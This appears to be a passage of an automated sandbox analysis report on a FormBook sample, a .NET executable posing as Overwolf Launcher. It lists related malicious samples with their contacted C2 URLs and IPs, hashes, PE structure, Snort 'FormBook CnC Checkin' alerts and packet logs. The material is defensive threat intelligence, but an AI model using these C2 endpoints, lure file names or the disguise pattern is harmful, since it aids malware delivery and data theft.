	pHUWiFd56t.exe	Get hash	malicious	Browse	www.brainandbodystrengthcoach.com/csv8/?Rxl=4rzgp1jZc7l8Whg0IztLQnvubqNqMY/2oz5HEUeZ+SGIDqCjyjtIs6qqwzFhp9I+dVCC&LJB=GbtlyLR0j
	invoice.xlsx	Get hash	malicious	Browse	www.cleverwares.com/c8so/?AFNDR=7n20cVCpbL7dqxQ&BBW=P253+QYRdhKTDdzjq4pa7Wp7svBpTNddHFol+cUWSKGzAXl94gLhBIvIcI/Xp4fU197lMA==
	BSL 01321 PYT.xlsx	Get hash	malicious	Browse	www.e-butchery.com/de92/?GBHXf2VP=SyfQvNxnxGuBvZveE7q+Mx8oTZDk0vYyrvtp8jcHqguCzq9Wh/Rqj3ZWA4DRZ6ODcHDiqw==&bB=oN64w0
	payment advice.xlsx	Get hash	malicious	Browse	www.fatboidonuts.com/wgn/?QDKx=ismPDkb1kDsJJlmQEj1IWX8WHEdOBI7aPWpMJ4Az70/HitJ3Qnb/ojRR8i7WZLNLjqtDug==&MDHl9T=mps01jexw
	Arrival notice.xlsx	Get hash	malicious	Browse	www.george-beauty.com/oean/?pJEtdJ=YYiBnx+uTbiyOiWOsIleXMl+TWVBeMM+hRG2hzgR9H7uS/Z2u5QgYOS3OsKMSH1P3GhSdw==&pL08=Grxte8Fh1bipd8g
	RFQ.xlsx	Get hash	malicious	Browse	www.experiencemoretogether.com/aky/?L2Jx=PJExAl&ObUhgbrX=TwjU4bk/hK/Rz/irfwftDMSiQA9z9Xtr+ITmJXkGe82JMHXMiJ/i+qjd6uOQ0U6KfPvIfw==
	13012021.exe	Get hash	malicious	Browse	www.whatilikeabouttoday.com/rbg/?Ezr0p8=arITf878KNHP92&rZvXUD=A6nTsYtjbxvih6vkmaX1Jrl6YwOaLYk0AAMk9b3gNlyy1aX90h7Cg1+rLkFaTXBkKYm6
	LOI.exe	Get hash	malicious	Browse	www.burgersandbarley.com/nhk9/?9r4P2=izkbuIM4pS07nj/jSOe9cHFSdHik4vqQ2XAojvhb7pCHWVIPZ7goRwN7tqCoHPvvvKwVcKFBmg==&0rT=g0DpkZJPuF6Hb
	Listings.exe	Get hash	malicious	Browse	www.uqabi.net/kta/
	quotation.exe	Get hash	malicious	Browse	www.ugcfashion.com/x2ee/?iBZLH8e=gj00CanoOA/MIDSuzzd4wA+9Xgu8XrjDu3Jyqr0DAD/cDq+vlAKlZeTP8PFKHz8QASJL27BTBA==&_RA89r=ZL3D3PvXurq
	Doc_74657456348374.xlsx.exe	Get hash	malicious	Browse	www.aaliyahchhabra.com/hpg3/?b8=omXuB1JLE2RxeysDSMNUzZRSUIahHxHrLG/5bHt0ZFUEfFlaWVdzHHrASVFC83QB2ak+xsl1fQ==&C0D=_DK4YF6
	Revise Order.exe	Get hash	malicious	Browse	www.endpedophiles.com/ehxh/?Lh0l=ZTdpL2D0k&nVjxUJ=zzMqP3gr9AvtiM4KAG8kTXsRbsDP8AWJ/7zGMGcvxlaU9iwirqdQaCWQ+gUupaaEafR3
165.160.13.20	61Order 0516.exe	Get hash	malicious	Browse	www.ostrum-am.com//ti/
	index[1].htm	Get hash	malicious	Browse	www.replicarolexllc.com/favicon.ico
	1(RFQ) - 14000102697.exe	Get hash	malicious	Browse	www.allianzpartnershop.com/ma/?BtIL=TV7UHZzggVvSZQDAWvGTdcqQjAICBJyilGxCRJLxTLSDLGEYUsm0jkgD8/qj9CQ5FOV8&_jL0dX=6lR0Brc8LNMdo8GP

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CSCUS	microsoft.exe	Get hash	malicious	Browse	165.160.15.20
POWERLINE-AS-APPOWERLINEDATACENTERHK	5DY3NrVgpI.exe	Get hash	malicious	Browse	154.215.48.175
	3S1VPrT4IK.exe	Get hash	malicious	Browse	154.92.73.145
	6OUYcd3GIs.exe	Get hash	malicious	Browse	154.216.110.70
	Swift transferi pdf.exe	Get hash	malicious	Browse	156.242.159.206
	yaQjVEGNEb.exe	Get hash	malicious	Browse	154.93.103.186
	zz4osC4FRa.exe	Get hash	malicious	Browse	154.216.110.171
	btVnDhh5K7.exe	Get hash	malicious	Browse	154.201.243.172
	c6Rg7xug26.exe	Get hash	malicious	Browse	154.218.55.251
	PURCHASE ORDER-34002174.doc	Get hash	malicious	Browse	156.252.104.205
	PO 24000109490.xlsx	Get hash	malicious	Browse	154.216.110.70
	Pending PURCHASE ORDER - 47001516.pdf.exe	Get hash	malicious	Browse	154.213.237.41
	order FTH2004-005 .exe	Get hash	malicious	Browse	154.213.159.8
	https://bit.ly/3hDDoTm	Get hash	malicious	Browse	160.124.53.36
	Order (2021.01.06).exe	Get hash	malicious	Browse	107.151.72.246
	order FTH2004-005.exe	Get hash	malicious	Browse	154.213.159.8
	990109.exe	Get hash	malicious	Browse	154.218.215.218
	IRS Notice Letter.exe	Get hash	malicious	Browse	154.216.102.213
	scan_118637_pdf.exe	Get hash	malicious	Browse	154.209.36.118
	SecuriteInfo.com.Heur.16160.xls	Get hash	malicious	Browse	154.209.36.118
	TqWufCUvxV.exe	Get hash	malicious	Browse	154.218.55.251
GOOGLEUS	FtLroeD5Kmr6rNC.exe	Get hash	malicious	Browse	35.204.150.5
	6blnUJRr4yKrjCS.exe	Get hash	malicious	Browse	34.102.136.180
	Consignment Document PL&BL Draft.exe	Get hash	malicious	Browse	34.102.136.180
	5DY3NrVgpI.exe	Get hash	malicious	Browse	34.102.136.180
	xrxSVsbRli.exe	Get hash	malicious	Browse	34.102.136.180
	3S1VPrT4IK.exe	Get hash	malicious	Browse	34.102.136.180
	AOA4sx8Z7l.exe	Get hash	malicious	Browse	34.102.136.180
	81msxxUisn.exe	Get hash	malicious	Browse	216.239.36.21
	g2fUeYQ7Rh.exe	Get hash	malicious	Browse	34.102.136.180
	pHUWiFd56t.exe	Get hash	malicious	Browse	35.184.90.176
	invoice.xlsx	Get hash	malicious	Browse	34.102.136.180
	BSL 01321 PYT.xlsx	Get hash	malicious	Browse	34.102.136.180
	payment advice.xlsx	Get hash	malicious	Browse	34.102.136.180
	Arrival notice.xlsx	Get hash	malicious	Browse	34.102.136.180
	RFQ.xlsx	Get hash	malicious	Browse	34.102.136.180
	5Q8WDPTQu3.jar	Get hash	malicious	Browse	108.177.119.139
	13012021.exe	Get hash	malicious	Browse	34.102.136.180
	1gEpBw4A95.exe	Get hash	malicious	Browse	216.239.32.21
	Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs	Get hash	malicious	Browse	108.177.119.128
	LOI.exe	Get hash	malicious	Browse	34.102.136.180
CLOUDFLARENETUS	FtLroeD5Kmr6rNC.exe	Get hash	malicious	Browse	23.227.38.74
	6blnUJRr4yKrjCS.exe	Get hash	malicious	Browse	104.24.111.173
	3S1VPrT4IK.exe	Get hash	malicious	Browse	104.19.152.30
	cGLVytu1ps.exe	Get hash	malicious	Browse	23.227.38.74
	onYLLDPXswyCVZu.exe	Get hash	malicious	Browse	104.28.4.151
	AOA4sx8Z7l.exe	Get hash	malicious	Browse	23.227.38.74
	PO-75013.exe	Get hash	malicious	Browse	104.28.4.151
	BSL 01321 PYT.xlsx	Get hash	malicious	Browse	66.235.200.145
	mssecsvc.exe	Get hash	malicious	Browse	104.17.244.81
	ZwFwevQtlv.exe	Get hash	malicious	Browse	172.67.188.154
	ssDV3d9O9o.exe	Get hash	malicious	Browse	172.67.188.154
	wjSwL3KItA.exe	Get hash	malicious	Browse	104.28.4.151
	Invoice-ID43739424297.vbs	Get hash	malicious	Browse	104.28.30.67
	Company Docs.exe	Get hash	malicious	Browse	104.23.98.190
	SecuriteInfo.com.Generic.mg.5a4b41327cabca49.exe	Get hash	malicious	Browse	104.28.5.151
	#U266b Audio_47720.wavv - - Copy.htm	Get hash	malicious	Browse	104.18.54.96
	PortionPac Chemical Corp..html	Get hash	malicious	Browse	104.16.19.94
	TD-10057.exe	Get hash	malicious	Browse	172.67.188.154
	NKP210102-NIT-SC2.exe	Get hash	malicious	Browse	172.67.188.154
	Listings.exe	Get hash	malicious	Browse	162.159.134.233

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Po-covid19 2372#w2..exe.log Download File
Process:	C:\Users\user\Desktop\Po-covid19 2372#w2..exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.200648874318885
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Po-covid19 2372#w2..exe
File size:	1304576
MD5:	bf53c9dc0d0f032033c318aceef906c6
SHA1:	eeba1ef352c09979dfdfb4afdcdc5f41fe2a0119
SHA256:	a1558391914f4235dfdcdddcdf0de915a800541a4271feb4aff34af82b83a935
SHA512:	7db00f26f4c0e6e6865ff4561ace1d6af4c8804e8534b29d6b1977f48c1863b7fbbd766a360e9d400aad4070568d33247e832b07da69a482004f14eab7c61383
SSDEEP:	24576:SlSjKBb8prhPsxedJuxzPiGqi4y5GLLnr:SlS+BQhEAJuxjlqhnr
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?^._..............0..b............... ........@.. .......................`............@................................

File Icon


Icon Hash:	d4d6d2d2d2ccc4d4

Static PE Info

General
Entrypoint:	0x5080fe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FFE5E3F [Wed Jan 13 02:43:11 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1080a4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10a000	0x381a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x144000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x106104	0x106200	False	0.756649193789	data	7.44459929766	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x10a000	0x381a0	0x38200	False	0.308106556236	data	5.20096741512	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x144000	0xc	0x200	False	0.041015625	data	0.0815394123432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x10a460	0x668	data
RT_ICON	0x10aac8	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2290649224, next used block 7403519
RT_ICON	0x10adb0	0x1e8	data
RT_ICON	0x10af98	0x128	GLS_BINARY_LSB_FIRST
RT_ICON	0x10b0c0	0x6739	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x1117fc	0xea8	data
RT_ICON	0x1126a4	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
RT_ICON	0x112f4c	0x6c8	data
RT_ICON	0x113614	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x113b7c	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON	0x1243a4	0x94a8	data
RT_ICON	0x12d84c	0x67e8	data
RT_ICON	0x134034	0x5488	data
RT_ICON	0x1394bc	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 2130706432
RT_ICON	0x13d6e4	0x25a8	data
RT_ICON	0x13fc8c	0x10a8	data
RT_ICON	0x140d34	0x988	data
RT_ICON	0x1416bc	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x141b24	0x102	data
RT_VERSION	0x141c28	0x388	data
RT_MANIFEST	0x141fb0	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright Overwolf 2011 - 2020
Assembly Version	2.159.0.0
InternalName	fC.exe
FileVersion	2.159.0.0
CompanyName	Overwolf Ltd.
LegalTrademarks
Comments	Overwolf Launcher
ProductName	OverwolfLauncher
ProductVersion	2.159.0.0
FileDescription	OverwolfLauncher
OriginalFilename	fC.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/13/21-08:51:26.238514	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49736	34.102.136.180	192.168.2.3
01/13/21-08:51:47.060177	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49737	80	192.168.2.3	165.160.13.20
01/13/21-08:51:47.060177	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49737	80	192.168.2.3	165.160.13.20
01/13/21-08:51:47.060177	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49737	80	192.168.2.3	165.160.13.20

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 08:51:26.058993101 CET	49736	80	192.168.2.3	34.102.136.180
Jan 13, 2021 08:51:26.099194050 CET	80	49736	34.102.136.180	192.168.2.3
Jan 13, 2021 08:51:26.099675894 CET	49736	80	192.168.2.3	34.102.136.180
Jan 13, 2021 08:51:26.099952936 CET	49736	80	192.168.2.3	34.102.136.180
Jan 13, 2021 08:51:26.140018940 CET	80	49736	34.102.136.180	192.168.2.3
Jan 13, 2021 08:51:26.238513947 CET	80	49736	34.102.136.180	192.168.2.3
Jan 13, 2021 08:51:26.238548994 CET	80	49736	34.102.136.180	192.168.2.3
Jan 13, 2021 08:51:26.238703012 CET	49736	80	192.168.2.3	34.102.136.180
Jan 13, 2021 08:51:26.238806009 CET	49736	80	192.168.2.3	34.102.136.180
Jan 13, 2021 08:51:26.278973103 CET	80	49736	34.102.136.180	192.168.2.3
Jan 13, 2021 08:51:46.925688982 CET	49737	80	192.168.2.3	165.160.13.20
Jan 13, 2021 08:51:47.059837103 CET	80	49737	165.160.13.20	192.168.2.3
Jan 13, 2021 08:51:47.060144901 CET	49737	80	192.168.2.3	165.160.13.20
Jan 13, 2021 08:51:47.060177088 CET	49737	80	192.168.2.3	165.160.13.20
Jan 13, 2021 08:51:47.194394112 CET	80	49737	165.160.13.20	192.168.2.3
Jan 13, 2021 08:51:47.204091072 CET	80	49737	165.160.13.20	192.168.2.3
Jan 13, 2021 08:51:47.204368114 CET	80	49737	165.160.13.20	192.168.2.3
Jan 13, 2021 08:51:47.204384089 CET	49737	80	192.168.2.3	165.160.13.20
Jan 13, 2021 08:51:47.204555988 CET	49737	80	192.168.2.3	165.160.13.20
Jan 13, 2021 08:51:47.338469982 CET	80	49737	165.160.13.20	192.168.2.3
Jan 13, 2021 08:52:09.772108078 CET	49740	80	192.168.2.3	154.92.73.140
Jan 13, 2021 08:52:10.069128990 CET	80	49740	154.92.73.140	192.168.2.3
Jan 13, 2021 08:52:10.069379091 CET	49740	80	192.168.2.3	154.92.73.140
Jan 13, 2021 08:52:10.069588900 CET	49740	80	192.168.2.3	154.92.73.140
Jan 13, 2021 08:52:10.366414070 CET	80	49740	154.92.73.140	192.168.2.3
Jan 13, 2021 08:52:10.370596886 CET	80	49740	154.92.73.140	192.168.2.3
Jan 13, 2021 08:52:10.370621920 CET	80	49740	154.92.73.140	192.168.2.3
Jan 13, 2021 08:52:10.371207952 CET	49740	80	192.168.2.3	154.92.73.140
Jan 13, 2021 08:52:10.371253967 CET	49740	80	192.168.2.3	154.92.73.140
Jan 13, 2021 08:52:10.668201923 CET	80	49740	154.92.73.140	192.168.2.3
Jan 13, 2021 08:52:29.575284004 CET	49741	80	192.168.2.3	104.24.109.70
Jan 13, 2021 08:52:29.626151085 CET	80	49741	104.24.109.70	192.168.2.3
Jan 13, 2021 08:52:29.626616001 CET	49741	80	192.168.2.3	104.24.109.70
Jan 13, 2021 08:52:29.626843929 CET	49741	80	192.168.2.3	104.24.109.70
Jan 13, 2021 08:52:29.677926064 CET	80	49741	104.24.109.70	192.168.2.3
Jan 13, 2021 08:52:29.685899973 CET	80	49741	104.24.109.70	192.168.2.3
Jan 13, 2021 08:52:29.686090946 CET	80	49741	104.24.109.70	192.168.2.3
Jan 13, 2021 08:52:29.686255932 CET	49741	80	192.168.2.3	104.24.109.70
Jan 13, 2021 08:52:29.686317921 CET	49741	80	192.168.2.3	104.24.109.70
Jan 13, 2021 08:52:29.736743927 CET	80	49741	104.24.109.70	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 08:50:11.885349989 CET	57544	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:50:11.933260918 CET	53	57544	8.8.8.8	192.168.2.3
Jan 13, 2021 08:50:16.002233028 CET	55984	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:50:16.053175926 CET	53	55984	8.8.8.8	192.168.2.3
Jan 13, 2021 08:50:17.099298000 CET	64185	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:50:18.100469112 CET	64185	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:50:18.937895060 CET	53	64185	8.8.8.8	192.168.2.3
Jan 13, 2021 08:50:19.940901995 CET	65110	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:50:19.988956928 CET	53	65110	8.8.8.8	192.168.2.3
Jan 13, 2021 08:50:20.795383930 CET	58361	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:50:20.843681097 CET	53	58361	8.8.8.8	192.168.2.3
Jan 13, 2021 08:50:21.789251089 CET	63492	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:50:21.840061903 CET	53	63492	8.8.8.8	192.168.2.3
Jan 13, 2021 08:50:36.541491985 CET	60831	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:50:36.604506969 CET	53	60831	8.8.8.8	192.168.2.3
Jan 13, 2021 08:50:38.455226898 CET	60100	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:50:38.506031990 CET	53	60100	8.8.8.8	192.168.2.3
Jan 13, 2021 08:50:41.168618917 CET	53195	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:50:41.216862917 CET	53	53195	8.8.8.8	192.168.2.3
Jan 13, 2021 08:50:51.317357063 CET	50141	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:50:51.368170023 CET	53	50141	8.8.8.8	192.168.2.3
Jan 13, 2021 08:50:51.476964951 CET	53023	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:50:51.534848928 CET	53	53023	8.8.8.8	192.168.2.3
Jan 13, 2021 08:50:52.558315039 CET	49563	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:50:52.606209040 CET	53	49563	8.8.8.8	192.168.2.3
Jan 13, 2021 08:50:53.523490906 CET	51352	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:50:53.571402073 CET	53	51352	8.8.8.8	192.168.2.3
Jan 13, 2021 08:50:54.668806076 CET	59349	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:50:54.725231886 CET	53	59349	8.8.8.8	192.168.2.3
Jan 13, 2021 08:50:55.702863932 CET	57084	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:50:55.750634909 CET	53	57084	8.8.8.8	192.168.2.3
Jan 13, 2021 08:50:56.748745918 CET	58823	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:50:56.796597004 CET	53	58823	8.8.8.8	192.168.2.3
Jan 13, 2021 08:50:57.905464888 CET	57568	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:50:57.953366041 CET	53	57568	8.8.8.8	192.168.2.3
Jan 13, 2021 08:50:57.972630978 CET	50540	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:50:58.024038076 CET	53	50540	8.8.8.8	192.168.2.3
Jan 13, 2021 08:51:12.496237993 CET	54366	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:51:12.568166018 CET	53	54366	8.8.8.8	192.168.2.3
Jan 13, 2021 08:51:16.039330959 CET	53034	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:51:16.087538004 CET	53	53034	8.8.8.8	192.168.2.3
Jan 13, 2021 08:51:16.768254995 CET	57762	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:51:16.825938940 CET	53	57762	8.8.8.8	192.168.2.3
Jan 13, 2021 08:51:16.839108944 CET	55435	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:51:16.886858940 CET	53	55435	8.8.8.8	192.168.2.3
Jan 13, 2021 08:51:17.842907906 CET	50713	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:51:17.893759966 CET	53	50713	8.8.8.8	192.168.2.3
Jan 13, 2021 08:51:25.981870890 CET	56132	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:51:26.053591967 CET	53	56132	8.8.8.8	192.168.2.3
Jan 13, 2021 08:51:46.852432966 CET	58987	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:51:46.924470901 CET	53	58987	8.8.8.8	192.168.2.3
Jan 13, 2021 08:51:48.151747942 CET	56579	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:51:48.199973106 CET	53	56579	8.8.8.8	192.168.2.3
Jan 13, 2021 08:51:50.372817993 CET	60633	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:51:50.428982973 CET	53	60633	8.8.8.8	192.168.2.3
Jan 13, 2021 08:52:09.404354095 CET	61292	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:52:09.769263029 CET	53	61292	8.8.8.8	192.168.2.3
Jan 13, 2021 08:52:29.502216101 CET	63619	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:52:29.573985100 CET	53	63619	8.8.8.8	192.168.2.3
Jan 13, 2021 08:52:57.307991028 CET	64938	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:52:57.364401102 CET	53	64938	8.8.8.8	192.168.2.3
Jan 13, 2021 08:52:58.448940039 CET	61946	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:52:58.508014917 CET	53	61946	8.8.8.8	192.168.2.3
Jan 13, 2021 08:52:59.604159117 CET	64910	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:52:59.660727978 CET	53	64910	8.8.8.8	192.168.2.3
Jan 13, 2021 08:53:00.640948057 CET	52123	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:53:00.691749096 CET	53	52123	8.8.8.8	192.168.2.3
Jan 13, 2021 08:53:01.215671062 CET	56130	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:53:01.274918079 CET	53	56130	8.8.8.8	192.168.2.3
Jan 13, 2021 08:53:02.101735115 CET	56338	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:53:02.157994032 CET	53	56338	8.8.8.8	192.168.2.3
Jan 13, 2021 08:53:03.029258966 CET	59420	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:53:03.077163935 CET	53	59420	8.8.8.8	192.168.2.3
Jan 13, 2021 08:53:04.407246113 CET	58784	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:53:04.463922977 CET	53	58784	8.8.8.8	192.168.2.3
Jan 13, 2021 08:53:05.615227938 CET	63978	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:53:05.663167000 CET	53	63978	8.8.8.8	192.168.2.3
Jan 13, 2021 08:53:06.348125935 CET	62938	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:53:06.446002960 CET	53	62938	8.8.8.8	192.168.2.3
Jan 13, 2021 08:53:12.572185993 CET	55708	53	192.168.2.3	8.8.8.8
Jan 13, 2021 08:53:13.559467077 CET	55708	53	192.168.2.3	8.8.8.8
